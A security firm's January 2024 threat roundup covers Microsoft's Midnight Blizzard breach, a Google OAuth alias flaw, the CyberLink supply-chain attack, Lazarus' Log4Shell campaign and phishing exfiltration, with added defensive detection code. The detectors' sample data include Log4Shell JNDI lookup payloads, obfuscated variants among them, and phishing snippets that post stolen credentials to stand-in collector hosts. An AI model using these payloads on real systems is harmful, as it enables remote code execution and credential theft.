Cybersecurity Threats Affecting Businesses in January 2024
The global cyber threat level has continued to increase as a function of general political unrest around the Middle East, Ukraine and China-Taiwan. The number of cybersecurity incidents continues to rise and their impact continues to grow. Organizations of all sizes and in all sectors need to increase their awareness of both the overall threat environment and the threats specifically relevant to their organization or industry. Threat hunting, offered as part of Marcum Technology’s Managed Security Services, can help provide this visibility by identifying potential risks to an organization.
Below are the top five threats that emerged over the past month.
Attack on Microsoft by Russian Threat Actor Groups
Beginning in late November 2023, the Russian threat actor known as Midnight Blizzard (aka Nobelium, Cozy Bear or APT29) used a password spray attack as the initial access method in an intrusion that eventually compromised Microsoft corporate email accounts. The affected accounts included members of Microsoft’s senior leadership, including CEO Satya Nadella, as well as staff in legal, cybersecurity and other functions. The group is assessed to be part of Russia’s foreign intelligence service, the SVR RF (Sluzhba vneshney razvedki Rossiyskoy Federatsii), indicating nation-state sponsorship.
The attack was detected on January 12, 2024, and indicators of compromise show that the intrusion dates back to late November 2023. Microsoft disclosed the incident in a Form 8-K filed with the US Securities and Exchange Commission on January 19, 2024, and asserts that it did not result from a vulnerability in Microsoft’s products or services. The initial foothold was a legacy, non-production test tenant account, which Microsoft has since stated did not have multifactor authentication enabled; from there the attackers leveraged a legacy test OAuth application with elevated access to move into the corporate environment and read mailbox contents. This raises the obvious questions of why a legacy test tenant was exposed to password spraying without MFA, and why access to it could be chained into production systems at all. The practical lessons are the usual ones: every account that can authenticate, test or not, needs MFA and conditional access; OAuth applications with broad mail permissions need an inventory and periodic review; and sign-in telemetry needs a detection for the spray pattern itself (many accounts, few attempts each, from a small set of sources) rather than only for per-account lockouts.
BleepingComputer provides an analysis of the attack here.
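The spray pattern that gave Midnight Blizzard its foothold is cheap to detect in sign-in telemetry if the detection keys on the shape of the failures rather than on per-account lockouts. The following is an added example, not code from the original article or from Microsoft: a sliding-window detector run over constructed sign-in events. The event format (one record per attempt with ts, user, ip and result), the addresses and the account names are assumptions; map your own identity provider’s sign-in log onto the same fields.

```python
"""Password-spray detection over constructed sign-in events.

Added example, not code from the original article or from Microsoft. The event
format (one dict per attempt with ts, user, ip, result) is an assumption; map
your own IdP's sign-in log onto it.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def _ev(ts, user, ip, result):
    return {"ts": ts, "user": user, "ip": ip, "result": result}


# Constructed sample, not real telemetry. 203.0.113.9 sprays six accounts twice
# each and then succeeds against a legacy test account; 198.51.100.7 brute-forces
# a single account; 192.0.2.5 is a user mistyping a password once.
SAMPLE_EVENTS = []
for i, name in enumerate(["alice", "bob", "carol", "dave", "erin", "legacy-test"]):
    SAMPLE_EVENTS.append(_ev(f"2023-11-28T02:0{i}:00Z", f"{name}@corp.example", "203.0.113.9", "FAIL"))
    SAMPLE_EVENTS.append(_ev(f"2023-11-28T02:1{i}:00Z", f"{name}@corp.example", "203.0.113.9", "FAIL"))
SAMPLE_EVENTS.append(_ev("2023-11-28T02:20:00Z", "legacy-test@corp.example", "203.0.113.9", "SUCCESS"))
for i in range(8):
    SAMPLE_EVENTS.append(_ev(f"2023-11-28T03:0{i}:00Z", "bob@corp.example", "198.51.100.7", "FAIL"))
SAMPLE_EVENTS.append(_ev("2023-11-28T09:00:00Z", "alice@corp.example", "192.0.2.5", "FAIL"))
SAMPLE_EVENTS.append(_ev("2023-11-28T09:00:30Z", "alice@corp.example", "192.0.2.5", "SUCCESS"))


def _parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_password_spray(events, window=timedelta(minutes=30), min_users=5, max_per_user=3):
    """Flag source IPs whose failures in any `window` hit at least `min_users`
    distinct accounts with no single account tried more than `max_per_user`
    times. That shape (wide, shallow) is a spray; a brute force (narrow, deep)
    fails the second test and is left to per-account lockout logic."""
    by_ip = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            by_ip[e["ip"]].append((_parse_ts(e["ts"]), e["user"]))
    alerts = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = Counter(u for _, u in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts[ip] = {"distinct_users": len(per_user), "failures": end - start + 1,
                              "first": fails[start][0].isoformat(), "last": fails[end][0].isoformat()}
    return alerts


def compromised_after_spray(events, alerts):
    """Accounts that later authenticated successfully from a flagged spray source:
    the short list to reset, revoke sessions for, and review OAuth grants on."""
    return [(e["user"], e["ip"], e["ts"]) for e in events
            if e["result"] == "SUCCESS" and e["ip"] in alerts]


if __name__ == "__main__":
    found = detect_password_spray(SAMPLE_EVENTS)
    print(found)
    print(compromised_after_spray(SAMPLE_EVENTS, found))
```

Two caveats for production use. A real spray is usually spread across many source addresses (residential proxy pools), so the same windowing should also be run keyed on user agent, ASN or the rarely changing client fingerprint, and a low-and-slow variant with one attempt per account per day needs a window measured in days; the wide-and-shallow shape test is unchanged. The success-after-spray list is the part that matters for response: those accounts need credential resets, session revocation and a review of any OAuth consents granted from them.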
Google OAuth Vulnerability – Ex-employee Backdoor
A Google OAuth weakness has been disclosed that lets departing employees, or worse, unauthorized third parties, retain access to various work applications after offboarding. The issue was discovered as early as August 4, 2023, and there does not appear to be a fix from Google as of this writing. This is especially surprising because Google appears to have a measure in place that prevents the same thing from happening to its own corporate accounts on the google.com domain.
The problem lies in the ability to use an existing email address when creating a new Google account: anyone can, for example, register a personal Google account using a company address. This alone poses no threat, since the address loses its access during offboarding. The vulnerability comes in when that person adds an additional alias to the account using plus-sign addressing, in which a word or string is appended after a “+” before the domain (for example, an alias of the form alice+anything@example.com for the address alice@example.com). Applications that accept “Sign in with Google” and authorize users on the email domain alone treat this alias as equivalent to the original address, yet the alias appears in none of the admin settings or user lists that would let it be detected and removed during offboarding.
Fortunately for individual organizations, the easy fix is to disable “Sign in with Google” wherever possible and enforce SAML authentication only. Service providers can take some limited measures to prevent this across their product, such as checking the hd (hosted domain) claim of the Google ID token, which Google only populates for Workspace and Cloud Identity accounts, and binding user identity to the immutable sub claim rather than to the email string; but these are not foolproof. The ideal solution is for Google to make the changes needed to truly remediate this vulnerability, and continuing to publish advisories like this one may motivate it to do so.
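To make the service-provider side concrete, here is an added example, not code from the original article, from Google or from the researchers who reported the issue: the domain-only acceptance rule the alias trick defeats, next to a hardened rule that checks the hd claim, rejects plus-addressed local parts and binds the login to the immutable sub claim looked up in an active-user directory. The claim sets are constructed to resemble the payload of a Google ID token after signature verification (which is out of scope here); the Workspace domain, the sub values and the directory contents are assumptions.

```python
"""Accepting a Google sign-in: a domain-only check next to a hardened one.

Added example, not from the original article, Google, or the researchers who
reported the issue. The claims below are constructed to look like the payload
of a Google ID token after signature verification (not shown); the Workspace
domain and the active-user directory are assumptions.
"""
ALLOWED_DOMAIN = "corp.example"        # assumption: the organization's Workspace domain

# Assumption: an export of *active* users from the authoritative directory,
# keyed by Google's immutable `sub`. Offboarding deletes the entry.
ACTIVE_USERS = {"110000000000000000001": "alice@corp.example"}

# Constructed ID-token claim sets (sub values are fake).
EMPLOYEE = {"sub": "110000000000000000001", "email": "alice@corp.example",
            "email_verified": True, "hd": "corp.example"}
# Consumer Google account created by an ex-employee with a plus-addressed alias
# of a work address: Google sets no `hd` claim for consumer accounts.
EX_EMPLOYEE_ALIAS = {"sub": "220000000000000000002", "email": "alice+old@corp.example",
                     "email_verified": True}
# Genuine Workspace account that has since been offboarded (sub no longer active).
OFFBOARDED = {"sub": "330000000000000000003", "email": "bob@corp.example",
              "email_verified": True, "hd": "corp.example"}


def naive_is_employee(claims):
    """The domain-only rule the article warns about: every case above passes."""
    return claims.get("email", "").lower().endswith("@" + ALLOWED_DOMAIN)


def hardened_login(claims):
    """Return (accepted, reason). No check here depends only on the email
    *string* ending in the right domain, which is all the alias trick controls."""
    if claims.get("hd") != ALLOWED_DOMAIN:
        return False, "hd_missing_or_wrong"      # not a Workspace account in our domain
    if claims.get("email_verified") is not True:
        return False, "email_unverified"
    email = claims.get("email", "").lower()
    local, _, domain = email.rpartition("@")
    if domain != ALLOWED_DOMAIN:
        return False, "domain_mismatch"
    if "+" in local:
        return False, "plus_address"             # the directory never issues tagged addresses
    if ACTIVE_USERS.get(claims.get("sub")) != email:
        return False, "not_active_in_directory"  # key on sub, not on the email string
    return True, "ok"


if __name__ == "__main__":
    for name, claims in [("employee", EMPLOYEE), ("ex-employee alias", EX_EMPLOYEE_ALIAS),
                         ("offboarded", OFFBOARDED)]:
        print(f"{name:18} naive={naive_is_employee(claims)} hardened={hardened_login(claims)}")
```

The hd check is the limited measure the text refers to: it stops a consumer account that merely lists a corporate address, but it says nothing about whether a genuine Workspace user is still employed, which is why the final lookup keys on sub against an up-to-date directory (or, equivalently, why SAML with SCIM deprovisioning is the cleaner answer).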
Diamond Sleet Supply Chain Attack via CyberLink Distribution
Microsoft Threat Intelligence has uncovered a supply chain attack by Diamond Sleet (formerly tracked as ZINC), a North Korean threat actor, involving a malicious variant of a CyberLink Corp application. The file is a legitimate CyberLink installer modified to include malicious code that retrieves and deploys a second-stage payload.
The file is signed with a valid CyberLink code-signing certificate and hosted on legitimate CyberLink update infrastructure, and it has impacted devices in numerous countries including Japan, Taiwan, Canada and the US. The malware is delivered via LambLoad, a weaponized downloader added to the legitimate CyberLink application. Before launching any malicious code, LambLoad checks that the date and time on the host fall within execution windows hard-coded into the loader, so a sandbox that runs the sample outside that window sees only the benign installer.
The loader also avoids environments running security software from FireEye, CrowdStrike or Tanium by checking for the associated process names. If any are present, the executable runs the normal CyberLink software and never executes the malicious code. Otherwise it attempts to contact one of three URLs to download the second-stage payload, which masquerades as a .png file: the payload sits behind a fake outer PNG header and is extracted, decrypted and launched in memory.
The second stage then attempts to contact up to two callback servers for further instructions, both of them legitimate domains hijacked by Diamond Sleet. At this point the beachhead is established and further commands can be issued to retrieve information or perform other actions. The obvious theme of this attack is the abuse of legitimate infrastructure and detection evasion: a valid signature, the vendor’s own update servers and compromised but reputable domains all mean that reputation-based controls alone will not stop it. Even legitimate domains and programs with no prior reports of abuse can be used to deliver malware, so up-to-date threat intelligence, together with hash-level and behavioral detection, is paramount.
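The second-stage masquerade described above is something an analyst can check structurally rather than by file extension or magic bytes alone. The following is an added example, not code from the original article or from Microsoft: it walks PNG chunks and distinguishes a real PNG from a PNG signature glued onto an opaque payload, and from a real PNG with data appended after IEND. Both inputs are constructed in the code; no malware is embedded, and the fake payload is just a placeholder byte string.

```python
"""Structural check of a file that claims to be a PNG.

Added example, not from the original article or Microsoft. A real PNG is
signature + IHDR ... IEND with a CRC32 on every chunk; a payload behind a fake
outer PNG header fails the chunk walk immediately. Inputs are constructed.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC32(type + data)."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def minimal_png():
    """A valid 1x1 8-bit grayscale PNG, built in code."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def fake_png(payload):
    """Constructed stand-in for the masquerade: PNG signature, then non-PNG bytes."""
    return PNG_SIG + payload


def inspect_png(blob):
    """Walk the chunk list and report how far the file behaves like a PNG."""
    result = {"has_signature": blob.startswith(PNG_SIG), "chunks": [], "bad_crc": 0,
              "reached_iend": False, "trailing_bytes": 0, "verdict": "not_png"}
    if not result["has_signature"]:
        return result
    off = len(PNG_SIG)
    while off + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[off:off + 8])
        # Chunk types are four ASCII letters; anything else means we are not in a PNG.
        if not ctype.isalpha() or off + 12 + length > len(blob):
            break
        data = blob[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", blob[off + 8 + length:off + 12 + length])
        if zlib.crc32(ctype + data) != crc:
            result["bad_crc"] += 1
        result["chunks"].append(ctype.decode("ascii"))
        off += 12 + length
        if ctype == b"IEND":
            result["reached_iend"] = True
            break
    result["trailing_bytes"] = len(blob) - off
    valid_layout = result["chunks"][:1] == ["IHDR"] and result["reached_iend"] and result["bad_crc"] == 0
    if valid_layout and result["trailing_bytes"] == 0:
        result["verdict"] = "png"
    elif valid_layout:
        result["verdict"] = "png_with_appended_data"   # e.g. polyglot or stashed payload
    else:
        result["verdict"] = "png_header_only"          # signature with no real chunk structure
    return result


if __name__ == "__main__":
    print(inspect_png(minimal_png())["verdict"])
    print(inspect_png(fake_png(b"MZ\x90\x00" + bytes(60))))
```

The "png_header_only" verdict is the one that matches the LambLoad description; "png_with_appended_data" catches the other common trick, a genuine image with a payload after IEND. Neither verdict on its own proves malice (some legitimate tools append metadata), but a downloaded image that a renderer would reject is worth pulling from the proxy cache for a closer look.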
Operation Blacksmith – Lazarus Group Exploits Log4Shell
Lazarus Group comprises sub-groups that operate independently in support of North Korea’s objectives. One of these sub-groups is Andariel, which focuses on initial access and espionage and occasionally deploys ransomware against healthcare organizations. Operation Blacksmith, as reported by Cisco Talos, mirrors Andariel’s tooling and tactics from previous Lazarus intrusions.
The campaign exploited CVE-2021-44228 (Log4Shell) and introduced NineRAT, a previously unseen RAT written in D (DLang). It emerged in March 2023 against a South American agricultural organization and reappeared in September 2023 targeting a European manufacturing entity. Talos identified parallels between this campaign and attacks attributed to Onyx Sleet (Andariel) by Microsoft in October 2023.
CVE-2021-44228 serves as Lazarus’s entry point, followed by deployment of HazyLoad for sustained access. HazyLoad, a common artifact in this campaign, is a custom proxy tool and was observed targeting European and American subsidiaries. The attackers then create additional user accounts and perform hands-on-keyboard activity using credential-dumping tools such as ProcDump and Mimikatz. Once credential dumping is complete, Lazarus deploys NineRAT on the infected systems.
NineRAT uses Telegram as its C2 channel so that its traffic blends in with legitimate use of a popular service. Its components perform reconnaissance and ensure persistent access. NineRAT and the proxy tools together give Lazarus multiple entry points, securing continuous access in a way that echoes past intrusions. The group appears to have begun operating its own bots for NineRAT after its reliance on Telegram-based C2 led to the discovery of previously used, publicly accessible bots that other attackers could hijack.
The use of NineRAT signals a shift in Lazarus’s tooling and continues a trend of the group authoring malware in non-traditional languages and frameworks such as D and the Qt framework. There is also evidence that separate repositories are created for collected data, hinting at information sharing among Lazarus sub-groups.
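Two points in this chain are visible in ordinary logs: the Log4Shell lookup string in web requests at the entry point, and Telegram Bot API traffic from hosts that should never drive a Telegram bot at the C2 stage. The following is an added example, not code from the original article or from Cisco Talos, showing both detections run over constructed log lines. The access log is Apache combined style and includes the plain, URL-encoded and nested-lookup obfuscated forms of the JNDI string; the proxy log format, addresses, bot token and the internal server range are all assumptions.

```python
"""Log4Shell attempts in access logs and Telegram bot C2 in proxy logs.

Added example, not from the original article or Cisco Talos. Log formats,
addresses, the bot token and the server network range are constructed.
"""
import ipaddress
import re
from urllib.parse import unquote

# Constructed access-log lines (Apache combined style). Line 1 is the plain
# lookup, line 2 is URL-encoded with ${lower:j}, line 3 uses ${::-x} pieces.
ACCESS_LOG = [
    '198.51.100.23 - - [22/Mar/2023:10:01:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.66:1389/a}"',
    '198.51.100.23 - - [22/Mar/2023:10:01:12 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.66%3A1389%2Fb%7D HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.23 - - [22/Mar/2023:10:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 ${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.66:1099/c}"',
    '192.0.2.10 - - [22/Mar/2023:10:02:00 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

_LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")              # ${env:X:-j}, ${::-j}
_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I)     # ${lower:j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.I)


def normalize_lookups(s, rounds=10):
    """Collapse nested Log4j lookups (inner-most first) until the string is stable,
    so obfuscated variants reduce to a literal ${jndi:...}."""
    s = unquote(unquote(s))
    for _ in range(rounds):
        new = _LOOKUP_CASE.sub(r"\1", _LOOKUP_DEFAULT.sub(r"\1", s))
        if new == s:
            break
        s = new
    return s


def scan_access_log(lines):
    """One finding per line containing a de-obfuscated JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize_lookups(line))
        if m:
            findings.append({"line": n, "src": line.split()[0],
                             "scheme": m.group(1).lower(), "callback": m.group(2)})
    return findings


# Constructed proxy-log lines. 10.20.0.15 is a server; 10.50.1.7 is a workstation.
PROXY_LOG = [
    "2023-09-14T08:00:00Z src=10.20.0.15 host=api.telegram.org path=/bot123456789:AAExampleTokenValue/getUpdates",
    "2023-09-14T08:00:01Z src=10.20.0.15 host=api.telegram.org path=/bot123456789:AAExampleTokenValue/sendDocument",
    "2023-09-14T08:05:00Z src=10.20.0.41 host=updates.example.org path=/",
    "2023-09-14T08:06:00Z src=10.50.1.7 host=api.telegram.org path=/bot987654321:AAOtherToken/getMe",
]
SERVER_NETS = [ipaddress.ip_network("10.20.0.0/16")]   # assumption: server VLAN
_PROXY = re.compile(r"src=(\S+) host=(\S+) path=(\S+)")
_BOT = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")


def scan_proxy_log(lines, server_nets=SERVER_NETS):
    """Flag Telegram Bot API calls from server ranges. The token itself is not
    copied into the finding, only the bot id and the method called."""
    findings = []
    for line in lines:
        m = _PROXY.search(line)
        if not m or m.group(2) != "api.telegram.org":
            continue
        src, path = m.group(1), m.group(3)
        if not any(ipaddress.ip_address(src) in net for net in server_nets):
            continue
        b = _BOT.match(path)
        if b:
            findings.append({"src": src, "bot_id": b.group(1), "method": b.group(3)})
    return findings


if __name__ == "__main__":
    print(scan_access_log(ACCESS_LOG))
    print(scan_proxy_log(PROXY_LOG))
```

The normalization step matters more than the final regex: most Log4Shell traffic that is still seen uses the nested-lookup forms precisely because naive signatures only match the literal string. On the C2 side, a bot id recovered from server-side proxy logs is also an investigation lead, since the same bot id reappearing across hosts ties infections to one operator.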
Credential Exfiltration Techniques in Phishing and Skimmer Pages
Detecting classic phishing attempts poses its own challenges, and identifying compromised pages hosting skimmers is even more formidable. Skimming code is placed to blend in seamlessly, so detection systems see no visual or hosting disparities. Phishing pages go a step further by concealing their exfiltration endpoints, so that even when the hosting page itself is identifiable, the point where credentials are collected is not. Palo Alto Networks’ Advanced URL Filtering (AUF) service has flagged over 216,000 unique instances of exfiltration attacks. These are predominantly aimed at stealing passwords (83%), with smaller shares targeting credit card details (2%), browser cookies (less than 1%) and other text on the page (approximately 15%). The analysis also shows a prevalent trend of malicious websites reusing the same exfiltration endpoints across many different domains and URLs, which makes the endpoint, rather than the page, the more durable thing to block.
The research further uncovers attackers exploiting reputable cloud APIs to carry out credential exfiltration. Threat actors have been seen misusing REST APIs belonging to chat platforms or survey-form services to siphon off stolen data. Because these requests go to trusted cloud domains, the abuse is hard to discern without visibility into the malicious sample itself; domain reputation alone does not flag it.
Malware authors also employ various stratagems to mask the theft. Some hide encoded stolen data inside concealed images, while others use obfuscation involving atypical DOM elements to dodge detection. The aim is to frustrate analysis, particularly where operators avoid dynamic code generation so that sandbox analysis has nothing suspicious to trigger on.
Moreover, modern malware often uses selective payload activation to evade detection. By reducing the occasions on which the payload detonates, attackers bypass both static and dynamic analysis. Samples have been observed that decline to activate when they encounter certain keywords or artifacts indicative of an analysis environment.
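The endpoint-reuse and cloud-API observations above suggest a simple triage step once phishing page sources have been collected: pull every place a page sends data, normalize it, and group pages by destination. The following is an added example, not code from the original article or from Palo Alto Networks, that does this over constructed page snippets covering a shared collector, a chat-platform webhook, an image request carrying encoded data, and a same-origin form. The hosting URLs, the snippets and the list of hosts treated as cloud APIs are assumptions; no real vendor endpoints are used.

```python
"""Extract and cluster candidate exfiltration endpoints from phishing page sources.

Added example, not from the original article or Palo Alto Networks. Page
snippets, hosts and the cloud-API host list are constructed assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urljoin, urlsplit

# Constructed page sources keyed by hosting URL. Three unrelated hosts post to
# the same collector; one abuses a chat webhook; one hides data in an image
# request; one posts to itself and should not be treated as a shared endpoint.
PAGES = {
    "https://login-m1crosoft.example/verify": '<form method="POST" action="https://collector.example/api/v1/store">...</form>',
    "https://secure-docs.example/index.php": '<form action="https://collector.example/api/v1/store" method="post">',
    "https://mail-update.example/auth": 'fetch("https://collector.example/api/v1/store", {method:"POST", body: JSON.stringify(d)})',
    "https://hr-portal.example/login": 'fetch("https://hooks.chat.example/services/T000/B000/XXXX", {method:"POST"})',
    "https://invoice-view.example/": 'var i=new Image(); i.src="https://cdn-stats.example/px.gif?d="+btoa(u+":"+p); i.width=0;',
    "https://bank-notice.example/": '<form action="/submit.php" method="post">',
}

# (kind, regex capturing the destination) for the common ways a page ships data out.
_EXTRACTORS = [
    ("form", re.compile(r"<form[^>]*\saction=[\"']([^\"']+)", re.I)),
    ("fetch", re.compile(r"\b(?:fetch|sendBeacon)\(\s*[\"']([^\"']+)", re.I)),
    ("img", re.compile(r"\.src\s*=\s*[\"']([^\"']+)", re.I)),
]
CLOUD_API_HOSTS = {"hooks.chat.example"}   # assumption: stand-in for abused chat/survey APIs


def extract_endpoints(page_url, source):
    """Return (kind, absolute_url) for every destination found in the source."""
    hits = []
    for kind, rx in _EXTRACTORS:
        for raw in rx.findall(source):
            hits.append((kind, urljoin(page_url, raw)))
    return hits


def endpoint_key(url):
    """Drop the query string so the same collector clusters regardless of per-page parameters."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}{p.path}"


def categorize(page_url, kind, url):
    if urlsplit(url).netloc == urlsplit(page_url).netloc:
        return "same_origin"
    if kind == "img" and "?" in url:
        return "image_beacon"          # data encoded into an image request
    if urlsplit(url).netloc in CLOUD_API_HOSTS:
        return "cloud_api"             # trusted domain, abused endpoint
    return "third_party"


def analyze_pages(pages):
    report = defaultdict(lambda: {"pages": [], "hosts": set(), "categories": set()})
    for page_url, source in pages.items():
        for kind, url in extract_endpoints(page_url, source):
            entry = report[endpoint_key(url)]
            entry["pages"].append(page_url)
            entry["hosts"].add(urlsplit(page_url).netloc)
            entry["categories"].add(categorize(page_url, kind, url))
    return {k: {"pages": v["pages"], "page_hosts": len(v["hosts"]), "categories": v["categories"]}
            for k, v in report.items()}


def shared_endpoints(report, min_hosts=2):
    """Endpoints referenced from at least `min_hosts` distinct phishing hosts:
    blocking these outlives any single phishing domain."""
    return sorted(k for k, v in report.items() if v["page_hosts"] >= min_hosts)


if __name__ == "__main__":
    rep = analyze_pages(PAGES)
    for k, v in rep.items():
        print(k, v["page_hosts"], sorted(v["categories"]))
    print("shared:", shared_endpoints(rep))
```

The cloud_api category is where the page's second point bites: the host is reputable, so the block has to be on the specific webhook or form path, and the evidence for it comes from the page source, not from domain reputation.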
If you’re facing challenges related to cybersecurity threats, breaches, and bad actors, or are interested in learning more about identifying potential threats to your organization, contact Marcum Technology today.